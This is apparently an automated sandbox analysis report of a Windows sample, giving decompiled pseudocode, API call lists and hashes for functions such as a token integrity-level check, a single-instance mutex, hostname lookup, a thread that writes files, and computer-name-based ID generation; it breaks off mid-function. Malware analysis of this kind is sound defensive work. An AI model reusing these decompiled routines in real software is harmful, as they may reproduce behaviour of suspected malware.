				_t172 = _a4;
				_t102 =  &_v264;
				 *_t102 = 0;
				_push(_t102);
				_push(1);
				_push(_t172);
				if( *((intOrPtr*)( *_t172 + 0x38))() < 0) {
					_t104 = 0;
					L26:
					return _t104;
				}
				_t105 = _v276;
				_t186 =  &_v236;
				 *_t186 = 0;
				 *((intOrPtr*)( *_t105 + 0x1c))(_t105, _t186);
				_v320 = 0;
				if( *_t186 <= 0) {
					L20:
					_t107 = _v284;
					 *((intOrPtr*)( *_t107 + 8))(_t107);
					_t153 = _a4;
					_t109 =  &_v332;
					 *_t109 = 0;
					_t110 =  *((intOrPtr*)( *_t153 + 0x28))(_t153, 0, _t109);
					_t104 = 0;
					if(_t110 < 0) {
						goto L26;
					}
					_t111 = _v344;
					_t180 = 0;
					_t188 =  &_v340;
					 *_t188 = 0;
					 *((intOrPtr*)( *_t111 + 0x1c))(_t111, _t188);
					if( *_t188 <= 0) {
						L25:
						_t113 = _v352;
						 *((intOrPtr*)( *_t113 + 8))(_t113);
						_t104 = _v348;
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						_t181 = _t180 + 1;
						_v340 = 3;
						_t115 = _v352;
						_v312 = 0;
						_v332 = _t181;
						_v292 = _t181;
						_v316 = _t181;
						_v296 = _v336;
						_v288 = _v328;
						_v300 = _v340;
						_v320 =  *_t115;
						_t117 =  *((intOrPtr*)(_v320 + 0x20))(_t115, _v300, _v296, _v292, _v288,  &_v312);
						 *0x6f9ddc( &_v364);
						if(_t117 >= 0) {
							_t120 = E006E3240(_v340, _a8, _a12);
							_t195 = _t195 + 0xc;
							_v372 = _v372 + _t120;
							_t121 = _v340;
							 *((intOrPtr*)( *_t121 + 8))(_t121);
						}
						_t180 = _v344;
					} while (_t180 < _v376);
					goto L25;
				}
				_t162 = 0;
				_t191 =  &_v316;
				_v320 = 0;
				do {
					_t163 = _t162 + 1;
					_v316 = 3;
					_t123 = _v284;
					_v328 = 0;
					_t148 = _t191;
					_v308 = _t163;
					_v280 = _t163;
					_v252 = _t163;
					_v296 = _t123;
					_v256 = _v312;
					_v248 = _v304;
					_v260 = _v316;
					_v292 =  *_t123;
					_t126 =  *((intOrPtr*)(_v292 + 0x20))(_v296, _v260, _v256, _v252, _v248,  &_v328);
					 *0x6f9ddc(_t148);
					if(_t126 < 0) {
						_t162 = _v308;
						_t191 = _t148;
						goto L19;
					}
					_t128 = _v356;
					_v344 = 0;
					_t129 =  *((intOrPtr*)( *_t128 + 0x1c))(_t128, _t148);
					_t191 = _t148;
					if(_t129 < 0) {
						L18:
						_t130 = _v364;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t162 = _v320;
						goto L19;
					}
					_t132 = _v364;
					_v360 = 0;
					_t133 =  *((intOrPtr*)( *_t132 + 0x50))(_t132,  &_v360);
					_t149 =  &_v284;
					if(_t133 < 0) {
						L17:
						 *((intOrPtr*)( *0x6f9dd8))(_v360);
						goto L18;
					}
					if(StrStrIW(_v368, _a8) == 0) {
						L16:
						 *0x6f9dd8(_v372);
						goto L17;
					}
					E006F4520(_t149, 0x20);
					_t195 = _t195 + 8;
					if(lstrcmpW(_v364, _t149) == 0) {
						E006F4520(_t149, 0x21);
						_t195 = _t195 + 8;
						if(StrStrIW(_v372, _t149) != 0) {
							L15:
							_v372 =  &(_v372[0x200]);
							goto L16;
						}
						E006F4520(_t149, 0x22);
						_t195 = _t195 + 8;
						if(StrStrIW(_v376, _t149) == 0) {
							_v376 =  &(_v376[0]);
							goto L16;
						}
						goto L15;
					}
					if(_a12 != 0) {
						_t144 = _a4;
						 *((intOrPtr*)( *_t144 + 0x3c))(_t144, _v364, 0);
					}
					goto L16;
					L19:
				} while (_t162 < _v272);
				goto L20;
			}

0x006e3249
0x006e324f
0x006e3252
0x006e3256
0x006e325e
0x006e325f
0x006e3261
0x006e3267
0x006e329c
0x006e350b
0x006e3512
0x006e3512
0x006e3269
0x006e326f
0x006e3273
0x006e3279
0x006e327e
0x006e3286
0x006e3418
0x006e3418
0x006e341f
0x006e3422
0x006e3425
0x006e342b
0x006e3434
0x006e3439
0x006e343e
0x00000000
0x00000000
0x006e3444
0x006e3448
0x006e344a
0x006e344e
0x006e3454
0x006e3459
0x006e34fd
0x006e34fd
0x006e3504
0x006e3507
0x00000000
0x00000000
0x00000000
0x00000000
0x006e345f
0x006e345f
0x006e345f
0x006e3460
0x006e3467
0x006e346b
0x006e3473
0x006e3477
0x006e347b
0x006e3487
0x006e348f
0x006e3493
0x006e3499
0x006e34bb
0x006e34c5
0x006e34cd
0x006e34d9
0x006e34de
0x006e34e1
0x006e34e5
0x006e34ec
0x006e34ec
0x006e34ef
0x006e34f3
0x00000000
0x006e345f
0x006e328c
0x006e328e
0x006e3292
0x006e32ac
0x006e32ac
0x006e32ad
0x006e32b4
0x006e32b8
0x006e32c0
0x006e32c2
0x006e32c6
0x006e32ca
0x006e32d6
0x006e32da
0x006e32e2
0x006e32e6
0x006e32ec
0x006e3311
0x006e3317
0x006e331f
0x006e33ab
0x006e33af
0x00000000
0x006e33af
0x006e3325
0x006e3329
0x006e3335
0x006e333a
0x006e333c
0x006e3400
0x006e3400
0x006e3407
0x006e340a
0x00000000
0x006e340a
0x006e3342
0x006e3346
0x006e3356
0x006e335b
0x006e335f
0x006e33f5
0x006e33fe
0x00000000
0x006e33fe
0x006e3376
0x006e33eb
0x006e33ef
0x00000000
0x006e33ef
0x006e337b
0x006e3380
0x006e3390
0x006e33b6
0x006e33bb
0x006e33c7
0x006e33e3
0x006e33e3
0x00000000
0x006e33e3
0x006e33cc
0x006e33d1
0x006e33dd
0x006e32a3
0x00000000
0x006e32a3
0x00000000
0x006e33dd
0x006e3396
0x006e3398
0x006e33a6
0x006e33a6
0x00000000
0x006e340e
0x006e340e
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 006E3317
StrStrIW.SHLWAPI(00000000,?), ref: 006E3372
lstrcmpW.KERNEL32(?,?), ref: 006E3388
StrStrIW.SHLWAPI(?,?), ref: 006E33C3
StrStrIW.SHLWAPI(?,?), ref: 006E33D9
SysFreeString.OLEAUT32(00000000), ref: 006E33EF
VariantClear.OLEAUT32(?), ref: 006E34C5

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ClearVariant$FreeStringlstrcmp
String ID:
API String ID: 1296292621-0
Opcode ID: 51eca568c39bf27634327692640947266b83e5daea070c290f48f9e5598fcc6b
Instruction ID: e55c15859d331b2c1cccd67a8f892e71c456e9cbd0209e166bb52b6124e09e99
Opcode Fuzzy Hash: 51eca568c39bf27634327692640947266b83e5daea070c290f48f9e5598fcc6b
Instruction Fuzzy Hash: 2391E0B5609351AFC704CF15C888A5ABBEAEFC8714F10891DF98987360DB71ED05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006E3A80, Relevance: 10.6, APIs: 7, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E006E3A80() {
				void _v84;
				long _v88;
				short _v92;
				void* _v96;
				struct _SID_IDENTIFIER_AUTHORITY _v100;
				void* _t12;
				void* _t15;
				void* _t16;
				int _t21;
				HANDLE* _t27;
				int _t28;
				PSID* _t29;

				_t29 =  &_v96;
				_t28 = 0;
				_t27 =  &_v100;
				 *_t27 = 0;
				_v88 = 0;
				 *_t29 = 0;
				_v92 =  *0x6f9a90 & 0x0000ffff;
				_t12 =  *0x6f9a8c; // 0x0
				_v96 = _t12;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t27) != 0) {
					_t21 = GetTokenInformation(_v100.Value, 1,  &_v84, 0x4c,  &_v88); // executed
					if(_t21 != 0) {
						_t28 = 0;
						if(AllocateAndInitializeSid( &_v100, 1, 0x12, 0, 0, 0, 0, 0, 0, 0, _t29) != 0) {
							_t28 = EqualSid(_v88,  *_t29);
						}
					}
				}
				_t15 =  *_t29;
				if(_t15 != 0) {
					FreeSid(_t15);
				}
				_t16 = _v100;
				if(_t16 != 0) {
					CloseHandle(_t16); // executed
				}
				return _t28;
			}

0x006e3a82
0x006e3a8c
0x006e3a8e
0x006e3a92
0x006e3a94
0x006e3a98
0x006e3a9b
0x006e3aa0
0x006e3aa5
0x006e3abb
0x006e3acf
0x006e3ad7
0x006e3adb
0x006e3af6
0x006e3b05
0x006e3b05
0x006e3af6
0x006e3ad7
0x006e3b07
0x006e3b0c
0x006e3b0f
0x006e3b0f
0x006e3b15
0x006e3b1b
0x006e3b1e
0x006e3b1e
0x006e3b2b

APIs

GetCurrentProcess.KERNEL32 ref: 006E3AA9
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E3AB3
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 006E3ACF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E3AEE
EqualSid.ADVAPI32(?), ref: 006E3AFF
FreeSid.ADVAPI32(00000000), ref: 006E3B0F
CloseHandle.KERNELBASE(?), ref: 006E3B1E

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpen
String ID:
API String ID: 3347031116-0
Opcode ID: a7fce65378fbb4ce80914347f6d507f085294ef5bd08a472441a48dacb1ed45f
Instruction ID: ae0e64b5d8407a8d721a4dadf25ec68bffb6ec4ab676bbfc4dfdd61343045a12
Opcode Fuzzy Hash: a7fce65378fbb4ce80914347f6d507f085294ef5bd08a472441a48dacb1ed45f
Instruction Fuzzy Hash: F3116D71204361ABDB209F25ED09F6BBBEAFF94B41F004819F885D3290E770C904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006E5370, Relevance: 7.6, APIs: 5, Instructions: 81
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 006E538D
gethostname.WS2_32(?,000000FF), ref: 006E53AA
getaddrinfo.WS2_32(?,00000000,00000000), ref: 006E53C0
FreeAddrInfoW.WS2_32(00000000), ref: 006E5444
WSACleanup.WS2_32 ref: 006E544F

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: AddrCleanupFreeInfoStartupgetaddrinfogethostname
String ID:
API String ID: 2736887295-0
Opcode ID: ba4a26c71ed5204de49e64ad495ae945d2ed72ad5309b03a45de4ffa0bf4b47f
Instruction ID: 0cdebd5e1caccc597cb891c0dbbfbd478746a11a5cf018ced9890fbf24933491
Opcode Fuzzy Hash: ba4a26c71ed5204de49e64ad495ae945d2ed72ad5309b03a45de4ffa0bf4b47f
Instruction Fuzzy Hash: E321C572A43B96DBEB304A268C4C7F662E79B4532AF590135DD13863E1D7748CC38652

Uniqueness

Uniqueness Score: -1.00%

Function 006E7340, Relevance: 7.6, APIs: 5, Instructions: 62
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E006E7340(void** __ecx) {
				char _v212;
				void* _v232;
				void* _v236;
				char _v240;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t12;
				struct _SECURITY_ATTRIBUTES* _t19;
				void* _t21;
				WCHAR* _t22;
				void** _t23;
				void** _t24;
				void** _t25;

				 *_t24 = 0;
				_t23 = __ecx;
				_t6 =  *__ecx;
				if(_t6 != 0) {
					CloseHandle(_t6);
					 *_t23 = 0;
				}
				_t22 =  &_v212;
				E006F4520(_t22, 0x25);
				_t25 =  &(_t24[2]);
				_t9 =  *0x6f9e54(_t22, 1, _t25, 0); // executed
				_t28 = _t9;
				if(_t9 == 0) {
					_t10 = 0;
					_t19 = 0;
					__eflags = 0;
					 *_t25 = 0;
				} else {
					_t10 =  *_t25;
					_t19 =  &_v240;
				}
				_v240 = 0xc;
				_v232 = 0;
				_v236 = _t10;
				_push(_t22);
				E006F3200(_t28);
				_t12 = CreateMutexW(_t19, 1, _t22); // executed
				 *_t23 = _t12;
				_t21 = _t25[1];
				if(_t21 != 0) {
					LocalFree(_t21);
					_t12 =  *_t23;
				}
				if(_t12 == 0 || GetLastError() != 0xb7) {
					__eflags = 0;
					return 0;
				} else {
					return 1;
				}
			}

0x006e7349
0x006e7350
0x006e7352
0x006e7356
0x006e7359
0x006e735f
0x006e735f
0x006e7365
0x006e736c
0x006e7371
0x006e737c
0x006e7382
0x006e7384
0x006e738f
0x006e7391
0x006e7391
0x006e7393
0x006e7386
0x006e7386
0x006e7389
0x006e7389
0x006e739a
0x006e73a2
0x006e73aa
0x006e73ae
0x006e73af
0x006e73bb
0x006e73c1
0x006e73c3
0x006e73c8
0x006e73cb
0x006e73d1
0x006e73d1
0x006e73d5
0x006e73e9
0x00000000
0x006e73e4
0x00000000
0x006e73e6

APIs

CloseHandle.KERNEL32(00000000), ref: 006E7359
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 006E737C
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 006E73BB
LocalFree.KERNEL32 ref: 006E73CB
GetLastError.KERNEL32 ref: 006E73D7

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: DescriptorSecurity$CloseConvertCreateErrorFreeHandleLastLocalMutexString
String ID:
API String ID: 1087375019-0
Opcode ID: f9376a107140a1fcabd8f9070cab89ed47bedf914e6ac0a35c5d3b115730643d
Instruction ID: 7cc22c60dc2d2fd5e759c905d3fe79999df5caf1fbaf39a1bd1b7863d9fbcbc2
Opcode Fuzzy Hash: f9376a107140a1fcabd8f9070cab89ed47bedf914e6ac0a35c5d3b115730643d
Instruction Fuzzy Hash: 21117770219341ABE7609F65DC89B7B7BEAEF80701F00482CF985D6380EB798844DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006E7C50, Relevance: 6.2, APIs: 4, Instructions: 219
sleepstringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E006E7C50() {
				long _t42;
				void* _t44;
				long _t45;
				long _t47;
				signed int _t49;
				long _t51;
				long _t54;
				intOrPtr _t55;
				signed int _t62;
				WCHAR* _t63;
				signed int _t64;
				signed int _t65;
				signed char _t67;
				long _t69;
				void* _t70;
				long _t71;
				struct _SECURITY_ATTRIBUTES* _t75;
				long _t80;
				signed int _t83;
				signed int _t86;
				signed int _t87;
				WCHAR* _t89;
				void* _t90;
				signed int _t91;
				signed int _t92;
				long _t93;
				signed int _t100;
				struct _SECURITY_ATTRIBUTES* _t102;
				void* _t104;
				WCHAR* _t107;
				void* _t108;
				DWORD* _t109;
				long* _t112;

				_t42 =  *0x6f9b9c; // 0x2fd0d0
				_t102 = 0;
				 *(_t108 + 4) = 0;
				 *((intOrPtr*)(_t108 + 8)) = 0;
				if( *_t42 == 1) {
					L44:
					return _t102;
				}
				_t44 = E006EB7A0( *0x6f9c40);
				_t109 = _t108 + 4;
				_t104 = _t44;
				_t45 =  *0x6f9b9c; // 0x2fd0d0
				_t102 = 0;
				_t90 =  *_t45;
				if(_t90 == 0) {
					__eflags =  *(_t45 + 0x10);
					if(__eflags != 0) {
						L13:
						E006E9DB0(__eflags);
						_t47 =  *0x6f9b9c; // 0x2fd0d0
						_t49 = E006F4610(_t109[0x3c], 0x19, _t47 + 4);
						_t109 =  &(_t109[3]);
						__eflags = _t49;
						if(_t49 == 0) {
							L42:
							if(_t104 != 0) {
								E006E91E0(_t104);
							}
							goto L44;
						}
						_t51 =  *0x6f9b9c; // 0x2fd0d0
						_t25 = _t51 + 4; // 0x0
						_t91 =  *_t25;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L42;
						}
						__eflags =  *_t91;
						_t109[3] = _t51;
						if( *_t91 == 0) {
							_t100 = _t91;
							_t83 = _t91;
							L26:
							__eflags = _t100 - _t91;
							if(_t100 <= _t91) {
								L41:
								_t102 = 0;
								__eflags = 0;
								CreateThread(0, 0, E006F6DB0, 0, 0, _t109);
								Sleep(0x1f4);
								goto L42;
							}
							__eflags = _t83 - _t91 - 0x3ff;
							if(_t83 - _t91 > 0x3ff) {
								goto L41;
							}
							_t32 = _t100 - 2; // 0x0
							_t107 = _t32;
							while(1) {
								__eflags = _t107 - _t91;
								if(_t107 <= _t91) {
									break;
								}
								_t65 =  *_t107 & 0x0000ffff;
								_t107 =  &(_t107[0xffffffffffffffff]);
								__eflags = _t65 - 0x2f;
								if(_t65 != 0x2f) {
									continue;
								}
								_t107 =  &(_t107[2]);
								__eflags = _t107;
								break;
							}
							_t54 = _t109[3];
							__eflags = _t107 - _t100;
							if(_t107 >= _t100) {
								L38:
								_t38 = _t54 + 0x14; // 0x0
								_t92 =  *_t38;
								__eflags = _t92;
								if(_t92 != 0) {
									E006E91E0(_t92);
									_t109 =  &(_t109[1]);
									_t54 =  *0x6f9b9c; // 0x2fd0d0
								}
								_t86 = _t83 + 0x00000002 - _t107 & 0xfffffffe;
								__eflags = _t86;
								 *(_t54 + 0x18) = _t86;
								_t55 = E006E3180(_t86, 0);
								_t93 =  *0x6f9b9c; // 0x2fd0d0
								 *((intOrPtr*)(_t93 + 0x14)) = _t55;
								_t41 = _t93 + 0x18; // 0x0
								E006EC400(_t55, _t107,  *_t41);
								_t109 =  &(_t109[5]);
								goto L41;
							}
							E006F4520( &(_t109[5]), 0x9e);
							_t112 =  &(_t109[2]);
							_t62 = E006F7BE0( &(_t112[7]),  &(_t112[7]), _t112,  &(_t112[4]));
							_t109 =  &(_t112[3]);
							__eflags = _t62;
							if(_t62 == 0) {
								L37:
								_t54 =  *0x6f9b9c; // 0x2fd0d0
								goto L38;
							}
							_t63 =  *_t109;
							__eflags = _t63;
							if(_t63 == 0) {
								goto L37;
							}
							__eflags = _t109[4];
							if(_t109[4] == 0) {
								goto L37;
							}
							_t64 = lstrcmpiW(_t107, _t63);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L42;
							}
							goto L37;
						}
						_t27 = _t91 + 2; // 0x2
						_t87 = _t27;
						while(1) {
							_t100 = _t87;
							__eflags = _t87 - _t91 - 0x400;
							if(_t87 - _t91 >= 0x400) {
								break;
							}
							__eflags =  *_t100;
							_t28 = _t100 + 2; // 0x4
							_t87 = _t28;
							if( *_t100 != 0) {
								continue;
							}
							_t83 = _t87 + 0xfffffffe;
							goto L26;
						}
						_t83 = _t100;
						goto L26;
					}
					_t89 =  &(_t109[5]);
					E006F4520(_t89, 0x9e);
					_t109 =  &(_t109[2]);
					_t67 = GetFileAttributesW(_t89); // executed
					__eflags = _t67 & 0x00000010;
					if(__eflags != 0) {
						goto L42;
					}
					goto L13;
				}
				if(_t90 != 2) {
					goto L42;
				}
				_t102 = 0;
				 *_t45 = 0;
				if( *((intOrPtr*)(_t45 + 8)) != 0 &&  *((intOrPtr*)(_t45 + 0xc)) != 0) {
					if( *((intOrPtr*)(_t45 + 0x14)) != 0 &&  *((intOrPtr*)(_t45 + 0x18)) != 0) {
						E006F4520( &(_t109[5]), 0x9e);
						_t80 =  *0x6f9b9c; // 0x2fd0d0
						_t8 = _t80 + 0x18; // 0x0
						_t9 = _t80 + 0x14; // 0x0
						E006E6270(_t80,  &(_t109[5]),  *_t9,  *_t8);
						_t109 =  &(_t109[5]);
					}
					E006F30C0(_t109);
					_t69 =  *0x6f9b9c; // 0x2fd0d0
					_t12 = _t69 + 0xc; // 0x0
					_t13 = _t69 + 8; // 0x0
					_t70 = E006F6F80( *_t13,  *_t12,  &(_t109[1]),  &(_t109[2]));
					_t109 =  &(_t109[4]);
					_t121 = _t70;
					if(_t70 == 0) {
						_t102 = 0;
						__eflags = 0;
					} else {
						_push(_t109[0x3d]);
						_push(_t109[3]);
						_push(_t109[3]);
						_t75 = E006F05C0(_t121);
						_t109 =  &(_t109[3]);
						_t102 = _t75;
						_t76 = _t109[1];
						if(_t109[1] != 0) {
							E006E91E0(_t76);
							_t109 =  &(_t109[1]);
							_t109[1] = 0;
							_t109[2] = 0;
						}
					}
					_t71 =  *0x6f9b9c; // 0x2fd0d0
					_t29 = _t71 + 8; // 0x0
					_t72 =  *_t29;
					if( *_t29 != 0) {
						E006E91E0(_t72);
						_t109 =  &(_t109[1]);
						_t72 =  *0x6f9b9c; // 0x2fd0d0
						 *((intOrPtr*)(_t72 + 8)) = 0;
						 *((intOrPtr*)(_t72 + 0xc)) = 0;
					}
					E006F03D0(_t72);
				}
			}

0x006e7c5a
0x006e7c5f
0x006e7c61
0x006e7c65
0x006e7c6c
0x006e7efa
0x006e7f06
0x006e7f06
0x006e7c78
0x006e7c7d
0x006e7c80
0x006e7c82
0x006e7c87
0x006e7c89
0x006e7c8d
0x006e7d4e
0x006e7d52
0x006e7d75
0x006e7d7c
0x006e7d81
0x006e7d8d
0x006e7d92
0x006e7d95
0x006e7d97
0x006e7eed
0x006e7eef
0x006e7ef2
0x006e7ef7
0x00000000
0x006e7eef
0x006e7d9d
0x006e7da2
0x006e7da2
0x006e7da5
0x006e7da7
0x00000000
0x00000000
0x006e7dad
0x006e7db1
0x006e7db5
0x006e7e04
0x006e7e06
0x006e7e0c
0x006e7e0c
0x006e7e0e
0x006e7ece
0x006e7ed0
0x006e7ed0
0x006e7edc
0x006e7ee7
0x00000000
0x006e7ee7
0x006e7e18
0x006e7e1e
0x00000000
0x00000000
0x006e7e24
0x006e7e24
0x006e7e27
0x006e7e27
0x006e7e29
0x00000000
0x00000000
0x006e7e2b
0x006e7e2f
0x006e7e32
0x006e7e35
0x00000000
0x00000000
0x006e7e37
0x006e7e37
0x00000000
0x006e7e37
0x006e7e3a
0x006e7e3e
0x006e7e40
0x006e7e8d
0x006e7e8d
0x006e7e8d
0x006e7e90
0x006e7e92
0x006e7e95
0x006e7e9a
0x006e7e9d
0x006e7e9d
0x006e7ea7
0x006e7ea7
0x006e7eaa
0x006e7eb0
0x006e7eb8
0x006e7ebe
0x006e7ec1
0x006e7ec6
0x006e7ecb
0x00000000
0x006e7ecb
0x006e7e4c
0x006e7e51
0x006e7e61
0x006e7e66
0x006e7e69
0x006e7e6b
0x006e7e88
0x006e7e88
0x00000000
0x006e7e88
0x006e7e6d
0x006e7e70
0x006e7e72
0x00000000
0x00000000
0x006e7e78
0x006e7e7a
0x00000000
0x00000000
0x006e7e7e
0x006e7e84
0x006e7e86
0x00000000
0x00000000
0x00000000
0x006e7e86
0x006e7db7
0x006e7db7
0x006e7dba
0x006e7dba
0x006e7dbe
0x006e7dc4
0x00000000
0x00000000
0x006e7dc6
0x006e7dca
0x006e7dca
0x006e7dcd
0x00000000
0x00000000
0x006e7dcf
0x00000000
0x006e7dcf
0x006e7e0a
0x00000000
0x006e7e0a
0x006e7d54
0x006e7d5e
0x006e7d63
0x006e7d67
0x006e7d6d
0x006e7d6f
0x00000000
0x00000000
0x00000000
0x006e7d6f
0x006e7c96
0x00000000
0x00000000
0x006e7c9c
0x006e7c9e
0x006e7ca3
0x006e7cb7
0x006e7cc9
0x006e7cd1
0x006e7cd6
0x006e7cd9
0x006e7cdd
0x006e7ce2
0x006e7ce2
0x006e7ce7
0x006e7cec
0x006e7cfb
0x006e7cfe
0x006e7d01
0x006e7d06
0x006e7d09
0x006e7d0b
0x006e7dd4
0x006e7dd4
0x006e7d11
0x006e7d11
0x006e7d18
0x006e7d1c
0x006e7d20
0x006e7d25
0x006e7d28
0x006e7d2a
0x006e7d30
0x006e7d37
0x006e7d3c
0x006e7d41
0x006e7d45
0x006e7d45
0x006e7d30
0x006e7dd6
0x006e7ddb
0x006e7ddb
0x006e7de0
0x006e7de3
0x006e7de8
0x006e7deb
0x006e7df2
0x006e7df5
0x006e7df5
0x006e7dfa
0x006e7dfa

APIs

GetFileAttributesW.KERNELBASE(?), ref: 006E7D67
lstrcmpiW.KERNEL32(-00000002,00000000), ref: 006E7E7E
CreateThread.KERNEL32(00000000,00000000,006F6DB0,00000000,00000000), ref: 006E7EDC
Sleep.KERNEL32(000001F4), ref: 006E7EE7

Part of subcall function 006E6270: CreateFileW.KERNEL32(006F077D,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006E628D
Part of subcall function 006E6270: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006E62A8
Part of subcall function 006E6270: CloseHandle.KERNEL32(00000000), ref: 006E62B6

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$Create$AttributesCloseHandleSleepThreadWritelstrcmpi
String ID:
API String ID: 357108698-0
Opcode ID: 244f8bfd46e7346854bcf57c8182ba3e603f23f0f614f62f1a64ea97b6ec76b3
Instruction ID: 426e0313dd1b01e24a02591e73309352813a15cbf363e6bd139f2a536c0efd3d
Opcode Fuzzy Hash: 244f8bfd46e7346854bcf57c8182ba3e603f23f0f614f62f1a64ea97b6ec76b3
Instruction Fuzzy Hash: 1C71C1716093459FDB24DF26EC45A7B77ABAF90704F04446DF5098B2A2EB31DD04CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006F5D00, Relevance: 6.1, APIs: 4, Instructions: 143
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E006F5D00(signed int __edx) {
				struct _OSVERSIONINFOW* _t26;
				WCHAR* _t28;
				int _t30;
				WCHAR* _t31;
				WCHAR* _t34;
				signed int _t35;
				signed int _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				WCHAR* _t48;
				signed short _t49;
				signed int _t52;
				signed int _t53;
				void* _t59;
				signed short _t61;
				signed short _t62;
				intOrPtr _t63;
				DWORD* _t65;
				signed int _t66;
				signed short _t67;
				WCHAR* _t68;
				void* _t69;
				intOrPtr* _t72;
				DWORD* _t73;
				signed int* _t74;
				signed int* _t77;
				void* _t78;

				_t58 = __edx;
				_t61 = 0;
				_t78 =  *0x6f9ac0 - _t61; // 0x2f87c8
				 *_t72 = 0;
				if(_t78 == 0) {
					_t26 = _t72 + 8;
					_t26->dwOSVersionInfoSize = 0x11c;
					GetVersionExW(_t26);
					_t28 = E006E3180(0x410, 0);
					_t73 = _t72 + 8;
					if(_t28 == 0) {
						L2:
						return _t61;
					}
					_t65 = _t73;
					_t48 = _t28;
					 *_t65 = 0x208;
					_t30 = GetComputerNameW(_t28, _t65); // executed
					if(_t30 == 0) {
						_t31 = E006E3180(0x474, _t48);
						_t73 =  &(_t73[2]);
						_t48 = _t31;
						GetComputerNameW(_t31, _t65);
						_t66 = 0x23a;
					} else {
						_t66 = 0x208;
					}
					E006F31C0(_t48, 0x5f);
					_t74 =  &(_t73[2]);
					_t68 =  &(_t48[_t66]);
					_t74[1] = _t48;
					do {
						_t34 = _t48;
						_t48 =  &(_t48[1]);
					} while (_t34 < _t68 && ( *_t34 & 0x0000ffff) != 0);
					if(_t34 < _t68) {
						 *((intOrPtr*)(_t48 - 2)) = 0x57005f;
						E006F4520( &(_t74[0x49]), 0x76);
						_t77 =  &(_t74[2]);
						_push(_t77[5]);
						_push(_t77[5]);
						E006F68E0( &(_t48[1]), _t68 -  &(_t48[1]) >> 1,  &(_t77[0x4c]), _t77[5]);
						_t74 =  &(_t77[6]);
					}
					_t52 = _t74[1];
					if(_t52 == 0) {
						L17:
						 *_t74 = 0;
						goto L2;
					} else {
						_t35 = 0;
						while( *((short*)(_t52 + _t35 * 2)) != 0) {
							_t35 = _t35 + 1;
							if(_t66 != _t35) {
								continue;
							}
							 *_t74 = 0;
							goto L17;
						}
						_t69 = 0;
						_t62 = 0;
						_t49 = 0;
						 *_t74 = _t35;
						do {
							_t67 = _t49;
							do {
								_t49 = E006E8160(_t58) & 0x0000000f;
							} while (_t49 == _t67 && _t49 == _t62);
							Sleep(1);
							_t53 = _t49 & 0x0000ffff;
							_t39 =  *_t74;
							_t62 = _t67;
							_t59 = _t53 + 0x41;
							_t55 =  <=  ? _t59 : _t53 + 0x2a;
							_t69 = _t69 + 1;
